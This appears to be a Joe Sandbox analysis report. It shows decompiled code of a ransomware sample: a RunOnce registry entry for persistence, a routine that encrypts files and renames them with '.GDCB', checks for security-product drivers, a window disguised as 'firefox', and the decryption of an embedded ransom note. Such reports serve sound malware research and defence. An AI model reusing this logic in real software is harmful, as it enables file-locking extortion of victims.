", xrefs: 00403D0C
y, xrefs: 00403C05
s, xrefs: 00403C79
e, xrefs: 00403CA9
\, xrefs: 00403C35
%, xrefs: 00403BD7
c, xrefs: 00403C81
o, xrefs: 00403C68
d, xrefs: 00403BED
t, xrefs: 00403C0D
", xrefs: 00403CB4
m, xrefs: 00403C15
, xrefs: 00403C91
c, xrefs: 00403CD5
i, xrefs: 00403BE4
l, xrefs: 00403C89
s, xrefs: 00403CE0

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
API String ID: 561366689-3790645798
Opcode ID: b6707db397b164f005e7f481d8c6e4cfd5bd65f7e48af9735fd005866d46f993
Instruction ID: cc7589b939d66cedc96280ec9e713ba096b07f437b5f45324ccf50025119f88d
Opcode Fuzzy Hash: b6707db397b164f005e7f481d8c6e4cfd5bd65f7e48af9735fd005866d46f993
Instruction Fuzzy Hash: FF515CB0108341DFE3208F11C94878BBFF9BF84749F00492DE5989A292D7FA9558CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00402960 Relevance: 63.1, APIs: 5, Strings: 31, Instructions: 87
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00402960(char* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				int _t47;
				char* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E00407C60( &_v32, lstrlenW( &_v32));
				_v140 = 0x4f0053;
				_t10 =  &_v8; // 0x402c45
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				if(RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0, _t10, 0) != 0) {
					return 0;
				} else {
					_t47 = lstrlenW(_t58);
					_t37 =  &_v8; // 0x402c45
					RegSetValueExW( *_t37,  &_v32, 0, 1, _t58, _t47 + _t47);
					asm("sbb esi, esi");
					RegCloseKey(_v8);
					_t39 =  &(_t58[1]); // 0x1
					return _t39;
				}
			}

0x0040296b
0x0040296d
0x00402979
0x00402980
0x00402984
0x0040298c
0x00402993
0x0040299a
0x004029a8
0x004029b0
0x004029ba
0x004029bd
0x004029c7
0x004029ce
0x004029eb
0x004029f8
0x004029ff
0x00402a06
0x00402a0d
0x00402a14
0x00402a1b
0x00402a22
0x00402a29
0x00402a30
0x00402a37
0x00402a3e
0x00402a45
0x00402a4c
0x00402a53
0x00402a5a
0x00402a61
0x00402a68
0x00402a6f
0x00402a76
0x00402a7d
0x00402a8c
0x00402ac7
0x00402a8e
0x00402a8f
0x00402aa1
0x00402aa4
0x00402aaf
0x00402ab1
0x00402ab7
0x00402abf
0x00402abf

APIs

lstrlenW.KERNEL32(00520050,00000041,74CF82B0,00000000), ref: 0040299D

Part of subcall function 00407C60: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
Part of subcall function 00407C60: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
Part of subcall function 00407C60: GetModuleHandleA.KERNEL32(?), ref: 00407CFF
Part of subcall function 00407C60: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
Part of subcall function 00407C60: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
Part of subcall function 00407C60: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
Part of subcall function 00407C60: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D73

RegCreateKeyExW.ADVAPI32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,E,@,00000000), ref: 00402A84
lstrlenW.KERNEL32(00000000), ref: 00402A8F
RegSetValueExW.ADVAPI32(E,@,00520050,00000000,00000001,00000000,00000000), ref: 00402AA4
RegCloseKey.ADVAPI32(?), ref: 00402AB1

Strings

\, xrefs: 004029EB
i, xrefs: 00402A1B
W, xrefs: 004029C7
n, xrefs: 00402A61
R, xrefs: 00402A68
P, xrefs: 0040296D
d, xrefs: 00402A22
r, xrefs: 00402A3E
s, xrefs: 00402A06
A, xrefs: 0040298C
V, xrefs: 00402A4C
n, xrefs: 00402A76
F, xrefs: 004029BD
e, xrefs: 00402A7D
R, xrefs: 004029CE
E,@, xrefs: 004029BA, 00402AA1, 004029D7
\, xrefs: 00402A30
U, xrefs: 00402984
u, xrefs: 00402A37
S, xrefs: 004029B0
r, xrefs: 00402A53
r, xrefs: 004029FF
n, xrefs: 00402A6F
I, xrefs: 00402979
i, xrefs: 00402A5A
n, xrefs: 00402A45
\, xrefs: 00402A14
i, xrefs: 004029F8
H, xrefs: 00402993
f, xrefs: 00402A0D
w, xrefs: 00402A29

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
String ID: A$E,@$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
API String ID: 553367697-1908525871
Opcode ID: e827ed829d67568777a520a8f55151da742d49e97d6881ee8a144ae909d7bb11
Instruction ID: 6d84f0b14520ef3984e43a4999751383e09c14a2564039d175e156e7e031e40b
Opcode Fuzzy Hash: e827ed829d67568777a520a8f55151da742d49e97d6881ee8a144ae909d7bb11
Instruction Fuzzy Hash: A431DBB090021CDFEB20CF91E949BEDBFB5FB01709F108119D5187A292D7BA4948CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004035E0 Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 300
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E004035E0(WCHAR* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				long _v24;
				void* _v28;
				WCHAR* _v32;
				void* _v36;
				long _v40;
				void* _v44;
				void* _v48;
				WCHAR* _v52;
				void* _v56;
				void* _v60;
				signed int _v64;
				void _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				long _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t100;
				void* _t106;
				long _t121;
				long _t122;
				void* _t123;
				long _t125;
				WCHAR* _t139;
				void* _t142;
				void* _t145;
				void* _t147;
				WCHAR* _t158;
				WCHAR* _t160;
				void* _t161;
				void* _t162;
				void _t164;
				long _t165;
				void* _t167;
				void* _t169;
				void* _t170;
				void* _t171;

				_t139 = __ecx;
				_t162 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t139, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v40 = 0;
				_t147 = _t162;
				E00405EA0(_t147, 0, 0,  &_v20,  &_v40);
				_t158 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x47002e;
				_v32 = _t158;
				_v76 = 0x430044;
				_v72 = 0x42;
				lstrcpyW(_t158, _t139);
				lstrcatW(_t158,  &_v80);
				asm("movdqa xmm0, [0x410950]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t147);
				asm("movdqa xmm0, [0x410950]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0x410950]");
				asm("movdqu [ebp-0x64], xmm0");
				E00407DB0( &_v104, 0x10);
				E00407DB0( &_v140, 0x20);
				_t92 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v44 = _t92;
				asm("movdqu [ebx+0x10], xmm0");
				_t93 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t159 = _t93;
				_v48 = _t93;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t95 = E00406000(_v20, _v40, _t92,  &_v88, 0x800);
				_t169 = _t167 + 0x18;
				if(_t95 == 0) {
					L22:
					_t160 = _v32;
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x40], xmm0");
					_t164 = _v68;
					_v8 = _v64;
					L23:
					VirtualFree(_t160, 0, 0x8000);
					return _t164;
				}
				_t100 = E00406000(_v20, _v40, _t159,  &_v84, 0x800);
				_t170 = _t169 + 0x14;
				if(_t100 != 0) {
					E00407EE0( &_v140,  &_v388);
					_t171 = _t170 + 8;
					_t142 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
					_v36 = _t142;
					if(_t142 == 0xffffffff) {
						goto L22;
					}
					_t161 = VirtualAlloc(0, 8, 0x3000, 4);
					 *_t161 = 0;
					 *(_t161 + 4) = 0;
					_t106 = VirtualAlloc(0, 0x100001, 0x3000, 4);
					_t165 = 0;
					_v28 = _t106;
					_v24 = 0;
					while(ReadFile(_t142, _t106, 0x100000,  &_v12, 0) != 0) {
						_t121 = _v12;
						if(_t121 == 0) {
							break;
						}
						_t145 = 0;
						_v60 = 0;
						_t165 =  <  ? 1 : _t165;
						 *_t161 =  *_t161 + _t121;
						asm("adc [edi+0x4], ebx");
						_t122 = _v12;
						_v8 = _t122;
						if((_t122 & 0x0000000f) == 0) {
							L12:
							_t123 = VirtualAlloc(0, _t122, 0x3000, 4);
							_t42 =  &_v8; // 0x406438
							_v56 = _t123;
							E004084E0(_t123, _v28,  *_t42);
							_t125 = _v12;
							_t171 = _t171 + 0xc;
							_v64 = _t125;
							if(VirtualAlloc(0, _t125, 0x3000, 4) != 0) {
								L00403500(_v56, _v64,  &_v60,  &_v388,  &_v104, _t126);
								_t145 = _v60;
								_t171 = _t171 + 0x10;
							}
							VirtualFree(_v56, 0, 0x8000);
							SetFilePointer(_v36,  ~_v8, 0, 1);
							if(WriteFile(_v36, _t145, _v12,  &_v16, 0) == 0) {
								_t165 = 1;
								_v24 = 1;
							}
							VirtualFree(_t145, 0, 0x8000);
							_t142 = _v36;
							if(_t165 == 0) {
								_t106 = _v28;
								continue;
							} else {
								break;
							}
						}
						do {
							_t122 = _t122 + 1;
						} while ((_t122 & 0x0000000f) != 0);
						_v12 = _t122;
						goto L12;
					}
					VirtualFree(_v28, 0, 0x8000);
					if(_v24 == 0) {
						WriteFile(_t142, _v44, 0x100,  &_v16, 0);
						WriteFile(_t142, _v48, 0x100,  &_v16, 0);
						WriteFile(_t142, _t161, 0x10,  &_v16, 0);
					}
					CloseHandle(_t142);
					_t164 =  *_t161;
					_v8 =  *(_t161 + 4);
					VirtualFree(_t161, 0, 0x8000);
					VirtualFree(_v44, 0, 0x8000);
					VirtualFree(_v48, 0, 0x8000);
					_t160 = _v32;
					if(_v24 == 0) {
						MoveFileW(_v52, _t160);
					}
					goto L23;
				}
				GetLastError();
				goto L22;
			}

APIs

GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 004035F4
SetFileAttributesW.KERNEL32(00000000,00000000), ref: 004035FF
VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0040363A
lstrcpyW.KERNEL32 ref: 00403658
lstrcatW.KERNEL32(00000000,0047002E), ref: 00403663

Part of subcall function 00407DB0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,74CB66A0,00000000), ref: 00407DD0
Part of subcall function 00407DB0: VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 00407DF8
Part of subcall function 00407DB0: GetModuleHandleA.KERNEL32(?), ref: 00407E4D
Part of subcall function 00407DB0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407E5B
Part of subcall function 00407DB0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407E6A
Part of subcall function 00407DB0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407E8E
Part of subcall function 00407DB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407E9C

Part of subcall function 00407DB0: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EB0
Part of subcall function 00407DB0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EBE

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 004036C6
VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 004036F1

Part of subcall function 00406000: EnterCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000,00000000,?,00000800), ref: 0040600B
Part of subcall function 00406000: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,00403724,00000000,00000000,00000000), ref: 0040602E
Part of subcall function 00406000: GetLastError.KERNEL32(?,00403724,00000000,00000000,00000000), ref: 00406038
Part of subcall function 00406000: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00403724,00000000,00000000,00000000), ref: 00406054

VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403998

Part of subcall function 00406000: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00403724,00000000,00000000), ref: 00406089
Part of subcall function 00406000: CryptGetKeyParam.ADVAPI32(00000000,00000008,$7@,0000000A,00000000,?,00403724,00000000), ref: 004060AA
Part of subcall function 00406000: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,$7@,?,00403724,00000000), ref: 004060D2
Part of subcall function 00406000: GetLastError.KERNEL32(?,00403724,00000000), ref: 004060DB
Part of subcall function 00406000: CryptReleaseContext.ADVAPI32(00000000,00000000,?,00403724,00000000,00000000), ref: 004060F8
Part of subcall function 00406000: LeaveCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000), ref: 00406103

GetLastError.KERNEL32 ref: 00403751
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 00403787
VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000004), ref: 004037A6
VirtualAlloc.KERNEL32(00000000,00100001,00003000,00000004), ref: 004037C5
ReadFile.KERNEL32(00000000,00000000,00100000,?,00000000), ref: 004037E1
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00403832
_memmove.LIBCMT ref: 00403842
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0040385A
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040388F

Strings

, xrefs: 0040370A
B, xrefs: 00403651
., xrefs: 0040363E
D, xrefs: 0040364A
8d@, xrefs: 0040399A, 00403838

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Virtual$Crypt$Alloc$Context$FileFree$AcquireErrorLastRelease$AttributesCriticalSection$AddressCreateEncryptEnterHandleImportLeaveLibraryLoadModuleParamProcRead_memmovelstrcatlstrcpy
String ID: $.$8d@$B$D
API String ID: 837238375-279925716
Opcode ID: cc765af47e0748f127cec44c57b369b1d6a7a1ea1d6bebdc5749c6e163b29892
Instruction ID: e6440529c24e0b0f2c5be8c2954fde7d882e22268c9ef2e78ee628bee86a44a3
Opcode Fuzzy Hash: cc765af47e0748f127cec44c57b369b1d6a7a1ea1d6bebdc5749c6e163b29892
Instruction Fuzzy Hash: 28B15DB1E40309BBEB119F94CD45FEEBBB8AB48700F204125F644BA2D1DBB45E448B98

Uniqueness

Uniqueness Score: -1.00%

Function 00402D30 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 137
windowthreadregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00402D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				short _t42;
				void* _t49;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				if(E00402F50( &(_v84.message)) != 0 || E00402F50( &_v96) != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E00402C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E00402D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) != 0) {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
							}
							goto L15;
						}
						ExitThread(_t71);
					}
					ExitThread();
				} else {
					_v84.message = 0x730066;
					_v84.wParam = 0x660064;
					_v84.lParam = 0x2e0077;
					_v84.time = 0x790073;
					_v84.pt = 0x73;
					if(E00402F50( &(_v84.message)) != 0) {
						L15:
						ExitThread(0);
					}
					_t61 = E004030A0(_t62, _t67, _t69);
					if(_t61 != 0) {
						goto L15;
					}
					_push(_t61);
					E00402AD0();
					goto L5;
				}
			}

0x00402d39
0x00402d3a
0x00402d3d
0x00402d45
0x00402d4a
0x00402d52
0x00402d5a
0x00402d62
0x00402d67
0x00402d6f
0x00402d77
0x00402d7f
0x00402d8e
0x00402de9
0x00402df1
0x00402df9
0x00402e01
0x00402e09
0x00402e11
0x00402e22
0x00402e26
0x00402e3d
0x00402e41
0x00402e49
0x00402e51
0x00402e5f
0x00402e68
0x00402e6e
0x00402e73
0x00402e7b
0x00402eaf
0x00402eb4
0x00402ebc
0x00402ec8
0x00402ecf
0x00402ee3
0x00402eeb
0x00402eee
0x00402eee
0x00402f09
0x00402f17
0x00402f1c
0x00402f25
0x00402f17
0x00000000
0x00402f09
0x00402ebf
0x00402ebf
0x00402e75
0x00402d9d
0x00402da1
0x00402da9
0x00402db1
0x00402db9
0x00402dc1
0x00402dd0
0x00402f3d
0x00402f3f
0x00402f3f
0x00402dd6
0x00402ddd
0x00000000
0x00000000
0x00402de3
0x00402de4
0x00000000
0x00402de4

APIs

Part of subcall function 00402F50: EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 00402F74

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00402E19
LoadCursorW.USER32(00000000,00007F00), ref: 00402E2E
LoadIconW.USER32 ref: 00402E59
RegisterClassExW.USER32 ref: 00402E68
ExitThread.KERNEL32 ref: 00402E75

Part of subcall function 00402F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402F8D

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 00402E7B
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 00402E81
CreateWindowExW.USER32 ref: 00402EA7
SetWindowLongW.USER32 ref: 00402EB4
ExitThread.KERNEL32 ref: 00402EBF

Part of subcall function 00402F50: EnumDeviceDrivers.PSAPI(00000000,00000000,?), ref: 00402FA8
Part of subcall function 00402F50: GetDeviceDriverBaseNameW.PSAPI(00000000,?,00000400), ref: 00402FCF
Part of subcall function 00402F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 00402FE3
Part of subcall function 00402F50: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402FFA

ExitThread.KERNEL32 ref: 00402F3F

Part of subcall function 00402AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 00402AEA
Part of subcall function 00402AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 00402B2C
Part of subcall function 00402AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 00402B38
Part of subcall function 00402AD0: ExitThread.KERNEL32 ref: 00402C47

ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 00402EC8
UpdateWindow.USER32(00000000), ref: 00402ECF
CreateThread.KERNEL32 ref: 00402EE3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 00402EEE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402F05
TranslateMessage.USER32(?), ref: 00402F1C
DispatchMessageW.USER32 ref: 00402F23
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402F37

Strings

s, xrefs: 00402DC1
1, xrefs: 00402D6F
d, xrefs: 00402DA9
w, xrefs: 00402DB1
0, xrefs: 00402DF1
win32app, xrefs: 00402E51, 00402EA0
firefox, xrefs: 00402E9B
s, xrefs: 00402D77
f, xrefs: 00402DA1
s, xrefs: 00402DB9
k, xrefs: 00402D67
s, xrefs: 00402D7F

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
API String ID: 3011903443-520298170
Opcode ID: 605d35a8cd460521619b827d31ec0ae0cacd7f64ed54dbd115d713509215f6a8
Instruction ID: 6dadb659047271fd80ce1d130f626f3db599e38ffd86fa9de69c1f1ec4dcf306
Opcode Fuzzy Hash: 605d35a8cd460521619b827d31ec0ae0cacd7f64ed54dbd115d713509215f6a8
Instruction Fuzzy Hash: 0F515070248302AFF7109F618D0DB5B7AE4AF44748F10092DF684BA2D1D7F99945CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 004040A0 Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 167
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E004040A0(void* __ecx) {
				char _v148;
				char _v152;
				void* _v156;
				short _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				char _v232;
				WCHAR* _v236;
				WCHAR* _v240;
				void* _t44;
				void* _t48;
				void* _t50;
				signed int _t51;
				void* _t52;
				WCHAR* _t56;
				signed short _t60;
				signed short* _t61;
				WCHAR* _t68;
				signed int _t73;
				signed int _t74;
				void* _t77;
				void* _t80;
				long _t83;
				WCHAR* _t84;
				signed int _t87;
				void* _t88;
				WCHAR* _t90;
				void* _t92;
				WCHAR* _t113;

				if( *0x412b04 != 0) {
					L25:
					return _t44;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E004039B0( &_v148);
				E00406D90( &_v236);
				_t87 = E00406BA0( &_v236);
				_t83 = 0x42 + _t87 * 2;
				_t48 = VirtualAlloc(0, _t83, 0x3000, 0x40);
				_v240 = _t48;
				if(_t48 == 0 || 0x40 + _t87 * 2 >= _t83) {
					_t88 = 0;
				} else {
					_t88 = _t48;
				}
				E004069A0( &_v152, _t88);
				_t50 = E00407BA0(_t88, L"ransom_id=");
				_t51 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0x410940]");
				_t68 = 0x412000;
				_t77 = 0xad;
				_t90 = _t50 + _t51 * 2;
				_t52 = 0xad0;
				_v240 = _t90;
				do {
					_t13 =  &(_t68[8]); // 0x44004e
					_t68 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t77 = _t77 - 1;
				} while (_t77 != 0);
				do {
					 *(_t52 + 0x412000) =  *(_t52 + 0x412000) ^ 0x00000005;
					_t52 = _t52 + 1;
				} while (_t52 < 0xad6);
				 *0x412b04 = 0x412000;
				_t84 = E00407BA0(0x412000, L"{USERID}");
				if(_t84 == 0) {
					L21:
					_v232 = 0x740068;
					_v228 = 0x700074;
					_v224 = 0x2f003a;
					_v220 = 0x67002f;
					_v216 = 0x630064;
					_v212 = 0x670062;
					_v208 = 0x760068;
					_v204 = 0x79006a;
					_v200 = 0x790071;
					_v196 = 0x6a0037;
					_v192 = 0x6c0063;
					_v188 = 0x2e006b;
					_v184 = 0x6e006f;
